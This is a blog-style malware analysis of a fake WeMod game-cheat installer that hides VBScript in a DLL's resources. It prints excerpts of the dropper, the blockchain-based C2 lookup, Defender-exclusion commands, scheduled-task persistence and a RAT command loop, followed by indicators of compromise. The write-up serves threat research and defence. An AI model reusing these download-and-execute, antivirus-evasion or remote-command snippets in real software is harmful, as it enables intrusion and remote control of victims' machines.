ol.mr
•15 min read

Fake WeMod Malware Analysis: Blockchain-Powered Game Cheat Trojan

⚠️ Fake WeMod Malware Analysis ⚠️


🔍 Executive Summary

🚨 IMPORTANT DISCLAIMER: This analysis covers a FAKE malware campaign that impersonates WeMod. The real WeMod (https://www.wemod.com) is a legitimate and safe game trainer software. This malware has NO affiliation with the actual WeMod company.

This malware campaign masquerades as WeMod - a legitimate and popular game trainer/cheat software. The threat actors have created fake distribution sites (wemodpc.com - NOT the real site) to lure gamers looking for free cheats, particularly for games like Subnautica.

What makes this malware particularly interesting is its use of blockchain technology (BSC Testnet) to store and retrieve C2 (Command & Control) server URLs, making the infrastructure harder to take down and providing a decentralized, censorship-resistant way to maintain command of infected machines.


🔎 Discovery & Initial Analysis

I was browsing GitHub when I stumbled upon a repository with a README that linked to wemodpc.com - immediately suspicious since the real WeMod site is wemod.com.

Screenshot: Fake WeMod link found in GitHub README

Visiting the fake site, I was surprised to find it looks nearly identical to the official WeMod website. Same branding, same layout, same promises - an average user would have no idea they're on a malicious clone. This level of effort in creating a convincing fake site shows we're dealing with a relatively sophisticated operation.

Downloading their "WeMod Setup" gave me a wemod-setup.zip containing two files:

  • WeMod.exe - The main executable
  • wemod.dll - A companion DLL file

Screenshot: Contents of wemod-setup.zip

The trick here is that the executable is signed by Adersoft - the company behind VBSEdit, a legitimate VBScript development tool. This immediately told me we're dealing with a VBSEdit-compiled payload. But here's the thing - if the EXE is just the Adersoft loader, then the actual malicious payload must be hiding somewhere else. VBSEdit-compiled executables store their scripts externally, usually in an accompanying DLL. So the real question became: what's in that DLL?


👻 The "Empty" DLL Mystery

Opening wemod.dll in IDA Pro or any disassembler - it appears almost empty with no meaningful code sections. No imports, no exports, no executable code - just... nothing.

Screenshot: Empty-looking DLL in PE viewer

This threw me off initially, so I loaded it up in ImHex (my beloved peepoblush.webp) to get a better look at the raw structure. ImHex's pattern matching system is perfect for situations like this - it can parse PE structures and highlight anomalies that traditional disassemblers miss.

Pro tip for the malware authors: padding this DLL with some junk code would've made it way less obvious that something fishy is going on here. You're welcome. omegalul.webp

I knew the payload had to be in this DLL based on how VBSEdit works, but there was nothing visible in the code sections. Why would a malware author distribute an empty DLL? The EXE clearly depends on it (won't run without it), but there's nothing there... or so it seems.

But when I checked the Resources section of the DLL, things got interesting. The resources weren't empty at all! Hidden within the PE resource section was data that doesn't show up in normal analysis tools.

Screenshot: DLL resources showing data

The PE resource section contains hidden data that standard analysis overlooks.

Opening the DLL in Resource Hacker exposed the payload - the actual malicious VBScript hiding in the resources:

Screenshot: Resource Hacker showing VBS payload

' Extracted VBS dropper (truncated)
Dim http, shell, fso
Set http = CreateObject("MSXML2.XMLHTTP")
Set shell = CreateObject("WScript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")

' Query blockchain for C2...
http.Open "POST", rpcEndpoint, False
http.SetRequestHeader "Content-Type", "application/json"
http.Send "{""jsonrpc"":""2.0"",""method"":""eth_call""..."

💡 Key Insight: This "empty DLL" trick is used by all subsequent payloads in this campaign. The EXE is just a loader that reads and executes the VBScript hidden in the DLL's resources! This is a clever technique because:

  • Static analysis tools often skip "empty" files
  • The actual malicious code is Base64-Encoded within PE resources, evading signature detection
  • The Adersoft signature on the EXE provides false legitimacy

Wait... Is That Blockchain?

Digging into the extracted VBScript, something immediately caught my eye - the malware is making JSON-RPC calls to what looks like... a blockchain? cjwhat.webp

' Build the JSON-RPC request to query the smart contract
rpcBody = "{""jsonrpc"":""2.0"",""id"":1,""method"":""eth_call"",""params"":[{" & _
          """to"":""" & contractAddress & """"," & _
          """data"":""0xe2d84e23""},""latest""]}"

http.Open "POST", "https://bsc-testnet.publicnode.com", False
http.SetRequestHeader "Content-Type", "application/json"
http.Send rpcBody

' Parse the hex response to get C2 URL
response = http.responseText
c2Url = HexToString(ParseJsonResponse(response))

This is wild - the malware is querying a smart contract on the BSC Testnet to retrieve its C2 server URL. This is my first time seeing blockchain used for malware C2 in the wild - it's a relatively rare technique. But first, let's walk through what each stage of the infection actually does.


📁 Stage 1: The Dropper

Capabilities

The initial dropper is relatively simple but effective. Here's the core download and execution logic:

' Download the next stage payload
payloadPath = shell.ExpandEnvironmentStrings("%LOCALAPPDATA%") & "\update_data.zip"
extractPath = shell.ExpandEnvironmentStrings("%LOCALAPPDATA%") & "\app_config"

http.Open "GET", payloadUrl, False
http.SetRequestHeader "Referer", "facebook.com"
http.Send

' Write ZIP to disk
Set stream = CreateObject("ADODB.Stream")
stream.Type = 1  ' Binary
stream.Open
stream.Write http.responseBody
stream.SaveToFile payloadPath, 2
stream.Close

' Extract and execute
Set shellApp = CreateObject("Shell.Application")
shellApp.Namespace(extractPath).CopyHere shellApp.Namespace(payloadPath).Items, 16

' Launch next stage
shell.Run """" & extractPath & "\setup_helper.exe""", 0, False

In summary, the dropper:

  1. Queries blockchain for C2 URL via JSON-RPC call
  2. Fetches payload URL from C2 (smartsoftarena.com) with the facebook.com referer trick
  3. Downloads ZIP payload from savuklubi.com or sperianism.com to %LOCALAPPDATA%\update_data.zip
  4. Extracts contents to %LOCALAPPDATA%\app_config
  5. Creates launcher script (run_helper.vbs) for persistence
  6. Executes setup_helper.exe to continue the infection

The Referer Trick

You might have noticed the "facebook.com" referer header in the code above. This is a clever anti-analysis technique used throughout the entire infection chain - all HTTP requests to the C2 and payload servers require this specific Referer header or they redirect you to Google.

Why "facebook.com"? This choice is deliberate:

  • Looks like legitimate social media traffic in network logs
  • Security researchers may miss this requirement when manually testing
  • Automated sandbox systems often don't set custom headers
  • Without the correct referer, you just get redirected to Google - nothing suspicious looking

This simple trick effectively breaks most automated analysis systems. Keep an eye out for this header in the code samples - it appears in every stage.

Kill Switch

Interestingly, the C2 can respond with "2" to trigger a fake Windows error and terminate the infection. This gives the attackers a way to abort infections remotely:

ElseIf k = "2" Then
    MsgBox "Error 0xc0000906", 16  ' Fake Windows error
    WScript.Quit
End If

This could be used to avoid infecting machines in certain regions, or to shut down the campaign if it attracts too much attention. In fact, the C2 returned "2" when I tested from my country without a VPN - looks like they're excluding certain regions, probably third world countries or places with lots of security researchers. weirdchamp.webp


📁 Stage 2: Persistence & Evasion

This stage focuses on establishing persistence and evading detection. It employs several techniques:

VM/Sandbox Detection

Before doing anything malicious, the payload checks if it's running in a virtual machine or sandbox:

' Check for VM UUIDs
If Len(Trim(uuid)) = 0 Or _
   uuid = "00000000-0000-0000-0000-000000000000" Or _
   uuid = "FFFFFFFF-FFFF-FFFF-FFFF-FFFFFFFFFFFF" Then
    WScript.Quit  ' Likely a VM, abort!
End If

These UUID patterns are common in VMs and sandboxes, so the malware exits silently if detected.

Windows Defender Exclusions

The malware adds exclusions to Windows Defender to avoid future detection - including a particularly dangerous one:

psCmd1 = "Add-MpPreference -ExclusionPath '" & path & "'" & vbCrLf & _
         "Add-MpPreference -ExclusionPath '" & SystemRoot & "\System32'"
shell.Run "powershell -ep Bypass -EncodedCommand " & EncodePS(psCmd1), 0, True

🚩 Red Flag: Adding System32 to Defender exclusions is extremely dangerous! This essentially gives any malware free reign in one of the most critical Windows directories. ‼️

Scheduled Tasks for Persistence

Two scheduled tasks ensure the malware survives reboots and continues running:

Task NameExecutableIntervalPrivilege
CfgHelperCfgHelper.exeEvery 30 minutesHIGHEST
CfgMgrCfgMgr.exeEvery 5 minutesHIGHEST

The Decoy: Maintaining the Illusion

To maintain the illusion that the victim actually installed WeMod, the malware runs the legitimate WeMod installer in the background:

shell.Run """" & path & "\Config\WeMod-Setup.exe""", 0, False

The Illusion shaco_hallucinate.png : The victim gets their expected "WeMod" installation and has no idea that malware is now running alongside it. This is social engineering at its finest - the user got what they wanted, so they have no reason to suspect anything.


📁 Stage 3: The RAT

This is the main Remote Access Trojan (RAT) component that turns the infected machine into a bot. The core of this stage is an infinite loop that polls the C2 for commands:

' Main RAT loop - runs forever
Do While True
    On Error Resume Next
    
    ' Check in with C2 for commands
    http.Open "POST", c2Url & "/dataG.php", False
    http.SetRequestHeader "Referer", "facebook.com"
    http.Send "bot_id=" & uuid & "&action=getTask"
    
    cmd = http.responseText
    
    If Len(cmd) > 0 Then
        ' Parse and execute command
        Select Case Split(cmd, "|")(0)
            Case "exec"   : shell.Run Split(cmd, "|")(1), 0, False
            Case "download" : DownloadAndRun Split(cmd, "|")(1)
            Case "shell"  : ExecuteShellCommand Split(cmd, "|")(1)
        End Select
    End If
    
    WScript.Sleep 60000  ' Check every 60 seconds
Loop

Capabilities

FeatureDescription
Bot RegistrationSends UUID, IP, OS, computer name to C2
Command PollingChecks in with C2 every 60 seconds
File DownloadDownload and execute arbitrary files
Remote ShellExecute arbitrary commands via cmd.exe
Archive HandlingExtract ZIP/RAR (includes bundled WinRAR)
Multi-format ExecutionRuns EXE, DLL, BAT, PS1, VBS files
Self-CleanupDeletes old files to avoid detection

Bot Checkin Data

When the bot first registers with the C2, it sends system information:

' Gather system info for registration
uuid = GetUUID()
localIP = GetLocalIP()
os = GetObject("winmgmts:").ExecQuery("Select * from Win32_OperatingSystem").ItemIndex(0).Caption
computerName = shell.ExpandEnvironmentStrings("%COMPUTERNAME%")

' Register with C2
http.Open "POST", c2Url & "/help.php", False
http.SetRequestHeader "Referer", "facebook.com"
http.Send "ip=" & localIP & _
          "&os=" & os & _
          "&bot_id=" & uuid & _
          "&computer_name=" & computerName & _
          "&client_id=" & "g5466435"  ' Campaign identifier

🔍 The client_id (g5466435) appears to be a campaign identifier, suggesting the attacker may be running multiple campaigns.


⛓️ Blockchain C2 & Anti-Analysis Tricks

Now let's dig into what makes this malware's infrastructure interesting - the blockchain-based C2.

The Smart Move: Decentralized C2

Instead of hardcoding C2 domains (which can be easily blocked or taken down), the malware queries a smart contract on the BNB Smart Chain (BSC) Testnet to retrieve the current C2 URL. This is a clever evolution in malware infrastructure. peepowand.webp

Screenshot: BSC Testnet contract interaction

Contract Details

PropertyValue
NetworkBSC Testnet
Contract Address (Dropper)0xA513Fe0A0289C33a8AE7e1DAA8F79A35CC10379a
Contract Address (Payload2)0xCbd36D9EBb84789F74e01c9EFFdF6a2fb8Bc275e
Function Selector0xe2d84e23

RPC Endpoints Used

The malware has multiple fallback RPC endpoints hardcoded - if one fails, it tries the next:

' Array of BSC Testnet RPC endpoints for redundancy
Dim rpcEndpoints(2)
rpcEndpoints(0) = "https://bsc-testnet.publicnode.com"
rpcEndpoints(1) = "https://bsc-testnet-dataseed.bnbchain.org"
rpcEndpoints(2) = "https://bsc-testnet.drpc.org"

' Try each endpoint until one works
For Each endpoint In rpcEndpoints
    On Error Resume Next
    http.Open "POST", endpoint, False
    http.Send rpcBody
    If http.Status = 200 Then Exit For
Next

Why BSC Testnet?

  • Free: No gas fees on testnet means zero operational cost
  • Persistent: Blockchain data is immutable - can't be deleted
  • Hard to takedown: No centralized authority to send abuse reports to
  • Easy updates: Attacker can update C2 URL anytime by calling the contract

🌐 C2 Infrastructure

Identified Domains

DomainPurpose
wemodpc.comFAKE WeMod distribution site (NOT the real wemod.com!)
smartsoftarena.comC2 server / Bot registration
savuklubi.comPayload hosting
sperianism.comPayload hosting

C2 Endpoints

https://smartsoftarena.com/673643686578679/help.php     - UUID registration
https://smartsoftarena.com/673643686578679/dataG.php    - Bot command server

Indicators of Compromise (IOCs)

File System

%LOCALAPPDATA%\update_data.zip
%LOCALAPPDATA%\app_config\
%LOCALAPPDATA%\run_helper.vbs
%LOCALAPPDATA%\install_log.txt
%PROGRAMDATA%\app_config\
%APPDATA%\app_config\log_32.txt
%APPDATA%\app_config\log_64.txt

Scheduled Tasks

CfgHelper (runs every 30 minutes)
CfgMgr (runs every 5 minutes)

Network

# Blockchain RPC (suspicious if from non-crypto application)
bsc-testnet.publicnode.com
bsc-testnet-dataseed.bnbchain.org
bsc-testnet.drpc.org

# C2 Domains
smartsoftarena.com
savuklubi.com
sperianism.com



⚠️ This analysis is for educational and defensive purposes only. ⚠️

Always analyze malware in isolated environments.

As always my friends, stay magical. peepoblushwizard.webppeepowand.webp